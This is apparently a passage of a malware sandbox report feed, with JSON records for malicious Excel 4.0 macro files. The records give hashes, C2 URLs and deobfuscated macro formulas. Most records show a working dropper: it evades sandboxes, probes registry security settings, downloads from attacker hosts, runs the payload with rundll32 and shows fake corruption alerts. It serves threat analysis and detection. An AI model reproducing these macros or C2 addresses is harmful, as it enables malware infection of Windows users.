,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"eVLfeI2FHH\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0bf2a550672110fc5f78842def6ec2cbf68ae8e63a6170dbb3253cbd3cb16dcb"},"analysis":{"reported":"2020-04-09T16:14:51Z","score":10},"files":[{"filename":"0bf2a550672110fc5f78842def6ec2cbf68ae8e63a6170dbb3253cbd3cb16dcb","filesize":185344,"md5":"276bbb8861c66a197935e5133d0d0755","sha1":"c989a383305325259e7870aa694e4a4b385453b4","sha256":"0bf2a550672110fc5f78842def6ec2cbf68ae8e63a6170dbb3253cbd3cb16dcb","sha512":"e7538212c31de561182abbbc8a99c0f21be16b658f09339bb56db6dd222fad7fb531f243e114067bb3881d4774a3d0c7f80a2b504a77fee0dc03667b8b00aa66","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0bf2a550672110fc5f78842def6ec2cbf68ae8e63a6170dbb3253cbd3cb16dcb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0c0bca1099201fe2d2a95ee05eac9613a047944584e9fa2856f5e6b773b27940"},"analysis":{"reported":"2020-04-09T16:14:51Z","score":10},"files":[{"filename":"0c0bca1099201fe2d2a95ee05eac9613a047944584e9fa2856f5e6b773b27940","filesize":168448,"md5":"ee84cf9acce7a36c38029f47570ec4e6","sha1":"d83924ad29c2b025cb9ac0d3be60c374a145252b","sha256":"0c0bca1099201fe2d2a95ee05eac9613a047944584e9fa2856f5e6b773b27940","sha512":"57c70fdc835897047a52add439dc3f93eb99e172700aa904e406649ee79bd599418dc97d4ddc30e3982ebfb10b828c5230208f97a33f5160e9076e13f9a1647f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0c0bca1099201fe2d2a95ee05eac9613a047944584e9fa2856f5e6b773b27940.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"4gSpTW3WiD\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0c0ef11fb1408577aa09b1f138962d82bc83c4bd8a5abd7c0fdde379cce726b9"},"analysis":{"reported":"2020-04-09T16:14:52Z","score":10},"files":[{"filename":"0c0ef11fb1408577aa09b1f138962d82bc83c4bd8a5abd7c0fdde379cce726b9","filesize":168448,"md5":"4cb1ef223204514c1c50c5d8d1ec6d18","sha1":"e0ae8302dbea8ca3ada5825b562a6676cccb29b2","sha256":"0c0ef11fb1408577aa09b1f138962d82bc83c4bd8a5abd7c0fdde379cce726b9","sha512":"6987ad07a2c249af93fc0840e5a2d58249277ee264935d95f070002116835671925c753aed56022b75fbea169edb6dfe9ff42b91b71a9b9df6fdf94b35065e75","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0c0ef11fb1408577aa09b1f138962d82bc83c4bd8a5abd7c0fdde379cce726b9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"q4NXHnmJrW\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0c18cb583a01d94f7bced0c67a3f14b269d7a62a28d994d734219d5c64f903c7"},"analysis":{"reported":"2020-04-09T16:14:52Z","score":10},"files":[{"filename":"0c18cb583a01d94f7bced0c67a3f14b269d7a62a28d994d734219d5c64f903c7","filesize":40960,"md5":"ed0501d1fb1c0432ddc41e09e862cb18","sha1":"f3c5d88cba5f953d363ecceb4740ea04209703fb","sha256":"0c18cb583a01d94f7bced0c67a3f14b269d7a62a28d994d734219d5c64f903c7","sha512":"13cfd07a7cb1a841c00b3f4d49b0e61c6ba6e41029c7b64bdee083a44f9d425325497ab3c67e3a4b419b652139e2535c37e99856765fa42eae72e88852122263","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0c18cb583a01d94f7bced0c67a3f14b269d7a62a28d994d734219d5c64f903c7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"SUM(R$1C$7,R$1C$8)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0c1e886917222f82cbb16900325b8901b1d1e3487c6f7fde3fab56c548878672"},"analysis":{"reported":"2020-04-09T16:14:52Z","score":10},"files":[{"filename":"0c1e886917222f82cbb16900325b8901b1d1e3487c6f7fde3fab56c548878672","filesize":209920,"md5":"2f70acf2272b9b0a468b8b3757a36aac","sha1":"abe084b3347df7d0f030c053044d40b9204e7f95","sha256":"0c1e886917222f82cbb16900325b8901b1d1e3487c6f7fde3fab56c548878672","sha512":"49dd1f85653a46371e208f17e64aa1a70ae3b505fcc812a510521cdea957efb60622cb8c56f2e104f893084b1e59cccf4f4558b4f75fdea2ea2dfc0db84fab3c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0c1e886917222f82cbb16900325b8901b1d1e3487c6f7fde3fab56c548878672.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"nQuDJwIUlc\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0c28aa2fc0695ffc2cae2410720177f376329e9586fe9cd024ba97e70d570407"},"analysis":{"reported":"2020-04-09T16:14:52Z","score":10},"files":[{"filename":"0c28aa2fc0695ffc2cae2410720177f376329e9586fe9cd024ba97e70d570407","filesize":221184,"md5":"723ca7473cc4855333df8f4fdcfbeaae","sha1":"fb46947157a189af405b87d86eb0ab4fb9e37fc0","sha256":"0c28aa2fc0695ffc2cae2410720177f376329e9586fe9cd024ba97e70d570407","sha512":"40befffeab731fc475feda742928c1afb798bc390e52b2006ffd6bdaa08e506bf642058fcb5d51e5942f53b243e1aa593e46ff8068d065d5a8e1163d768bce4c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0c28aa2fc0695ffc2cae2410720177f376329e9586fe9cd024ba97e70d570407.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ZDMjCWf4D0\",TRUE)\nGOTO(R$3C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0c32b2291d2f36330b24b1d4bc6d106e5dbd5d7f5b3d4aa43a2e49d9efb6d293"},"analysis":{"reported":"2020-04-09T16:14:52Z","score":10},"files":[{"filename":"0c32b2291d2f36330b24b1d4bc6d106e5dbd5d7f5b3d4aa43a2e49d9efb6d293","filesize":209920,"md5":"cca35486b7258e511b8722c8ba32c065","sha1":"65a519c92ed59d8c0fcc7dcd699187eb31e702a2","sha256":"0c32b2291d2f36330b24b1d4bc6d106e5dbd5d7f5b3d4aa43a2e49d9efb6d293","sha512":"68b1ff86df8093e59f1a052616bdda1c80561fb77bfd424c4f70f0edaff37b27bea9675fe723a9bca9f19dc7821b565a7015f785720d0ea827dd579be5fcb54f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0c32b2291d2f36330b24b1d4bc6d106e5dbd5d7f5b3d4aa43a2e49d9efb6d293.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"HKH5hPQa8c\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0c3747e9b803966feed9efb5f5542481f868a29e9144a28ca2dbfeb83c045154"},"analysis":{"reported":"2020-04-09T16:14:52Z","score":10},"files":[{"filename":"0c3747e9b803966feed9efb5f5542481f868a29e9144a28ca2dbfeb83c045154","filesize":160768,"md5":"685b206a0a7689e7b32513a858ba9ffd","sha1":"bde142928d42032180692ff15238f99ab589b0b2","sha256":"0c3747e9b803966feed9efb5f5542481f868a29e9144a28ca2dbfeb83c045154","sha512":"614111a4a0147e68278c1982fe0d9aeb298faf1d5389aff645bef87ccd01933e8f232ad72e5ab26791534d3ed808ccb94daa6294054d1f0fe35a7cd567126581","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0c3747e9b803966feed9efb5f5542481f868a29e9144a28ca2dbfeb83c045154.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"4CrsvmM6hX\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0c3cd099fb0512cd74866dc13bd073d0628b63313d0a18601dc6356c8ada6164"},"analysis":{"reported":"2020-04-09T16:14:52Z","score":10},"files":[{"filename":"0c3cd099fb0512cd74866dc13bd073d0628b63313d0a18601dc6356c8ada6164","filesize":185344,"md5":"18dcbe08e12c603569cef9e01c97935b","sha1":"de8b137e66cf57dd734ef5a3183e49538b738560","sha256":"0c3cd099fb0512cd74866dc13bd073d0628b63313d0a18601dc6356c8ada6164","sha512":"925712b0d0bd0d8142b67d78a582286ca5350d9f3180c9e561a5ee034e1ac373254136c853850d29ab5523b7d6467a029260fe4da64f28d82e27f1a8053915ff","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0c3cd099fb0512cd74866dc13bd073d0628b63313d0a18601dc6356c8ada6164.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0c47d6f7135013ea9ce3d0181bd3201b1bd5cef6aeb7ad26d7072ed1a259beba"},"analysis":{"reported":"2020-04-09T16:14:52Z","score":10},"files":[{"filename":"0c47d6f7135013ea9ce3d0181bd3201b1bd5cef6aeb7ad26d7072ed1a259beba","filesize":171008,"md5":"7f12c0703d943d4986182ff55028bdf5","sha1":"47c595e89d33e1d07d378f47899cd7cf12ab3d1c","sha256":"0c47d6f7135013ea9ce3d0181bd3201b1bd5cef6aeb7ad26d7072ed1a259beba","sha512":"9212432c2b68fdfc9d6707b5d1db91d606871e1d7b4adfadda43d36745e041fc381d6d30211644a5450d66c68aeb3b7d44a793eefe08009fd1b332aa67204c96","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0c47d6f7135013ea9ce3d0181bd3201b1bd5cef6aeb7ad26d7072ed1a259beba.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ethelenecrace.xyz/fbb3"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ethelenecrace.xyz/fbb3\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"FhuyTTeweg\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0c4b8c42962e8a04cc9e4855524248b491bc311572b53cf56bb903bb4d0bb91d"},"analysis":{"reported":"2020-04-09T16:14:52Z","score":10},"files":[{"filename":"0c4b8c42962e8a04cc9e4855524248b491bc311572b53cf56bb903bb4d0bb91d","filesize":112128,"md5":"8164fa82c4033614e297ca1e9a658a04","sha1":"899746250a4fe76843c3c7567edd405ffe1258c4","sha256":"0c4b8c42962e8a04cc9e4855524248b491bc311572b53cf56bb903bb4d0bb91d","sha512":"b7063231eab88254e2b574a7ad643df5548743024907547109a9297fa2a29cd3d568e48e227da02563b931ee43a7105919ecf4d42a651ae5109f8f75d7dd77f8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0c4b8c42962e8a04cc9e4855524248b491bc311572b53cf56bb903bb4d0bb91d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0c54264ff7824d4f6b0a5972d7d7c08e9ceda51a0a20920db40b672e3572a709"},"analysis":{"reported":"2020-04-09T16:14:52Z","score":10},"files":[{"filename":"0c54264ff7824d4f6b0a5972d7d7c08e9ceda51a0a20920db40b672e3572a709","filesize":207360,"md5":"db3d7686e5ac24fd0e07e9481dcac955","sha1":"9376999e5e2153618bd8c7fdcb4b2666c564a9bb","sha256":"0c54264ff7824d4f6b0a5972d7d7c08e9ceda51a0a20920db40b672e3572a709","sha512":"a7684f0839c77796e50d91d614b6a002b6b7f5a90297000c27af57a3eabfd7d183e800236431a1814251f7394a3ebe78b5d51fcf11eb1f870191bdfd8664731b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0c54264ff7824d4f6b0a5972d7d7c08e9ceda51a0a20920db40b672e3572a709.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://greentec-automation.com/wp-cran.php","https://narensyndicate.com/wp-cran.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://greentec-automation.com/wp-cran.php\",\"c:\\Users\\Public\\cskc75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://narensyndicate.com/wp-cran.php\",\"c:\\Users\\Public\\cskc75ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cskc75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"6JB9MusG5I\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0c7ce5ffc3e404b44af2605e840233445d9d167f6f4d725ad33426d5476d1e99"},"analysis":{"reported":"2020-04-09T16:14:52Z","score":10},"files":[{"filename":"0c7ce5ffc3e404b44af2605e840233445d9d167f6f4d725ad33426d5476d1e99","filesize":209920,"md5":"83e564ecd5d1c3e754e2829702b706d4","sha1":"8462fdd38ca641bcefe4e322669ca964e01a5925","sha256":"0c7ce5ffc3e404b44af2605e840233445d9d167f6f4d725ad33426d5476d1e99","sha512":"96b972484554663ecbfe1e6006dd8fa929c2c91f5c0d64bdcf238de41b6d3871dccc985706ff19a170edf5c7bc63afa104ab19a1cedc96c7d7c30f65a53d74f6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0c7ce5ffc3e404b44af2605e840233445d9d167f6f4d725ad33426d5476d1e99.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"C3MAQgZNI1\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0c7e15ee15ad034814bd39a24196af8af91d76f6402ac212fcd4f1f182dd92de"},"analysis":{"reported":"2020-04-09T16:14:52Z","score":10},"files":[{"filename":"0c7e15ee15ad034814bd39a24196af8af91d76f6402ac212fcd4f1f182dd92de","filesize":112640,"md5":"bb3f316b880354b800eb061b870bed5c","sha1":"671328547d52386991424dc8f8fd85eee3eae268","sha256":"0c7e15ee15ad034814bd39a24196af8af91d76f6402ac212fcd4f1f182dd92de","sha512":"92e0985a96bf75d8a297480ab327f37bc54293af9503991115d2772e72abe4aa420368343554a80ce91e524a5a531bd47015bedb28a7c7b7fea25911f2a43883","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0c7e15ee15ad034814bd39a24196af8af91d76f6402ac212fcd4f1f182dd92de.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
